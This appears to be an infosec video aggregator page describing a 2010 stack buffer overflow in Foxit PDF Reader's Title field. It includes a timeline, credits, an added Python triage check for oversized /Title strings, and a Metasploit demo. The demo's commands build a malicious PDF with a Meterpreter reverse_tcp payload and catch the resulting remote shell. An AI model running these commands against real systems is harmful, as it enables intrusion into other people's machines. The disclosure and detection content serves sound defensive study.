Description: Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
Timeline:
Vulnerability reported to the vendor by offsec before the public release on Exploit-DB
Vendor released a new version on 2010-09-29
dookie & Sud0 exploit released on Exploit-DB on 2010-11-13
Metasploit exploit released on 2010-11-22
Provided by:
dookie
Sud0
corelanc0d3r
jduck
References:
EDB-ID-15532
Affected versions:
Foxit PDF Reader prior to version 4.2.0.0928
Tested on Windows 7 Integral with:
Foxit PDF Reader 4.1.1.0805
Description:
This module exploits a stack buffer overflow in Foxit PDF Reader prior to version 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in the Title field, which overwrites a structured exception handler (SEH) record on the stack. NOTE: This exploit does not use JavaScript.
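As an added defensive example that is not part of the original page or of the Metasploit module, the following Python triage check measures the decoded length of every /Title string in a PDF and flags any that is far longer than a legitimate document title. The sample PDF bytes and the 512-byte threshold are constructed assumptions, not values from the advisory.

```python
import re

# Constructed sample PDFs (not from the original page): one benign, one with an oversized Title.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj\n<< /Title (Quarterly report) /Author (A. Example) >>\nendobj\n%%EOF\n"
SUSPECT_PDF = b"%PDF-1.4\n1 0 obj\n<< /Title (" + b"A" * 3000 + b") >>\nendobj\n%%EOF\n"

# Threshold is an assumption; real titles are rarely more than a few hundred bytes.
MAX_TITLE_LEN = 512

def extract_title_lengths(pdf: bytes) -> list:
    """Return the approximate decoded byte length of every /Title string.

    Handles PDF literal strings "(...)" (balanced nested parentheses and
    backslash escapes; multi-digit octal escapes are slightly overcounted)
    and hex strings "<...>". Compressed object streams are not inflated,
    so this is a first-pass triage check, not a full PDF parser.
    """
    lengths = []
    for m in re.finditer(rb"/Title\s*", pdf):
        i = m.end()
        if pdf[i:i + 1] == b"(":
            depth, j, n = 1, i + 1, 0
            while j < len(pdf):
                c = pdf[j:j + 1]
                if c == b"\\":          # escape: skip the escaped byte as well
                    j += 2
                    n += 1
                    continue
                if c == b"(":
                    depth += 1
                elif c == b")":
                    depth -= 1
                    if depth == 0:
                        break
                n += 1
                j += 1
            lengths.append(n)
        elif pdf[i:i + 1] == b"<":
            end = pdf.find(b">", i)
            raw = pdf[i + 1:end if end != -1 else len(pdf)]
            hexdata = re.sub(rb"\s", b"", raw)
            lengths.append((len(hexdata) + 1) // 2)  # two hex digits per byte
    return lengths

def flag_oversized_title(pdf: bytes, limit: int = MAX_TITLE_LEN) -> bool:
    """True if any /Title string exceeds the configured limit."""
    return any(n > limit for n in extract_title_lengths(pdf))
```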
Metasploit demo:
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
Owned
Tags: metasploit, foxit, pdf, 0day, exploit, microsoft
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.